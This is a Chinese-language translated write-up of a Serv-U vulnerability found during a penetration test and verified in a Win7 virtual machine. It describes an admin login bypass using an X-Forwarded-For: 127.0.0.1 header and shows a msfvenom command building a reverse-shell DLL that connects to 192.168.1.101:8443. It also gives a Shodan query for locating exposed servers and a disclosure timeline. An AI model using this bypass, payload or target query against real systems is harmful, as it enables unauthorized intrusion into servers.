看我如何在滲透測試過程中發現並利用Serv-U漏洞進行操作系統提權

最近，我在做一個外網滲透測試的過程中，發現了SolarWinds文件共享程序Serv-U的一個漏洞，通過該漏洞我獲得了Serv-U的管理許可權，並能以系統用戶身份執行遠程代碼，成功完成操作系統提權。

在此，我在Win7虛擬機中安裝Serv-U程序，對該漏洞作出驗證。

前期發現

Serv-U安裝之後，不需要進行任何配置，其默認的Web服務埠為127.0.0.1，由於是本地伺服器地址，即使提供外部服務也不需要更改此IP。

基於這個Web服務端，我利用Burp Suite的Spider功能來發現了其/?Command=Login請求點可能存在問題，之後，繼續利用Burp Suite的Scanner功能，用包含X-Forwarded-For頭的POST請求對該點發起fuzz攻擊，來觀察其響應結果。沒過一會，通過對這些響應信息的手工驗證後發現，當提交的登錄請求中包含了X-Forwarded-For頭為127.0.0.1的POST請求信息時，Serv-U程序將以本地管理員身份響應一個有效的Session會話。

雖然該POST請求通過Firefox瀏覽器會產生一個如下的錯誤提示：

但其本地管理員身份的Session會話卻是有效的，利用該Cookie構造GET請求：

可以順利以管理員身份登錄Serv-U管理後台：

進一步利用

經過一番研究發現，攻擊者可以利用http://127.0.0.1:43958/Admin/ServerLimits.htm頁面下的集成庫文件導入功能（intergration library），上傳並執行任意DLL文件：

這裡，我用msfvenom來製作免殺的惡意DLL文件MFC100PWN.dll，如下：

root@6c656f:~# msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.101 LPORT=8443 -f dll > MFC100PWN.dllNo platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 1810 bytes Final size of dll file: 5120 bytes root@6c656f:~# file MFC100PWN.dllMFC100PWN.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

該DLL文件將會向192.168.1.101:8443執行反彈連接，所以，這裡用Metasploit開啟一個監聽端listener。

操作系統提權

把MFC100PWN.dll文件通過Serv-u web client上傳至 目錄」C:Program FilesRhinoSoftServ-U」：

執行該DLL文件：

不出意外，通過該DLL文件的反彈shell，我們獲得了Serv-u所在系統的管理員許可權。

漏洞影響

至2017年1月30日，通過Shodan查詢，可以發現全球聯網的，安裝有類似Serv-U服務的15,000多台伺服器都面臨此漏洞威脅，而據我們研究發現，Serv-U在15.1.5之前的所有版本都受此漏洞影響。（具體漏洞信息參考此聲明）

Server: Serv-U/ product:"Rhinosoft Serv-U httpd"

漏洞報告進程

01/13/2017 – 向SolarWind披露漏洞

02/17/2017 – SolarWind發布補丁

03/22/2017 – 公開漏洞

*參考來源：SpiderLabs，freebuf小編clouds編譯，轉載請註明來自Freebuf.com。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！